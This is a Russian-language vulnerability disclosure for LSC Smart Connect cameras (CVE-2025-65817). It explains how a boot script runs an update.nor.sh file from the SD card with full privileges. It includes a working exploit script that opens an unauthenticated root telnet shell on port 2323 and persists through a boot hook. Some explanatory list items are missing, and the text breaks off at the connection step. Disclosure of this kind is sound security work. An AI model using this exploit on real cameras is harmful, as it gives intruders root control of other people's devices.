
Вот CVE-2025-65817
| Fields | Value |
|---|---|
| Название | Отчет об уязвимости: камера LSC Smart Connect |
| Дата | 2024-02-15 |
| Описание | Использование хука обновления SD-карты для запуска удаленных оболочек на камерах LSC Smart Connect. |
| Теги | iot, уязвимость, cve |
| Прошивка | 1.14.13 |
Обнаруженная уязвимость заключается в эксплуатации системы обновления в start_app.sh, а точнее — через монтирование SD-карты и файл update.nor.sh.
# routines of sd-card
# /mnt is for backword compatible
SDC_DIR=/mnt
SDC_HOOK=$SDC_DIR/update.nor.sh
SDC_FLAG_DEBUG=$SDC_DIR/__ipc_debug.ini
TMP_HOOK=/tmp/update.nor.sh
SENSOR_ISP_HOOK=$SDC_DIR/ISP/*t23.bin
# debug core-dump
WHERE_COREDMP="/mnt/sdc/coredmp"
WHERE_EXEC="/usr/local/bin/doraemon"
Раздел local/sbin/start_app.sh:50–99 слепо доверяет любому файлу с именем update.nor.sh, расположенному на SD-карте. Во время загрузки скрипт:
update.nor.sh в /tmp/update.nor.sh,Позже в последовательности запуска (local/sbin/start_app.sh:108–129) скопированный файл:
Это выполнение происходит до запуска основного ipc_service, то есть скрипт работает в среде с максимальными привилегиями, где уже доступны сетевые утилиты, функции сторожевого таймера и вспомогательные средства обновления.
Эксплойт заключается в создании оболочки и открытии порта через telnetd, который присутствует на камере:
/bin # busybox --list
[...]
sh
sleep
swapoff
syslogd
tail
tar
tcpsvd
telnetd
[...]
Нам нужно лишь записать .sh-скрипт на SD-карту и назвать его update.nor.sh.
Выбранный мной эксплойт:
#!/bin/sh
telnetd -l /bin/sh -p 2323 &
echo "Telnet start by update.nor.sh" > /tmp/exploit_success
cp /mnt/update.nor.sh /mnt/config/hook-boot.sh
date > /tmp/exploit_time
Подтверждаем, что порт открыт.

Подключаемся через telnet:
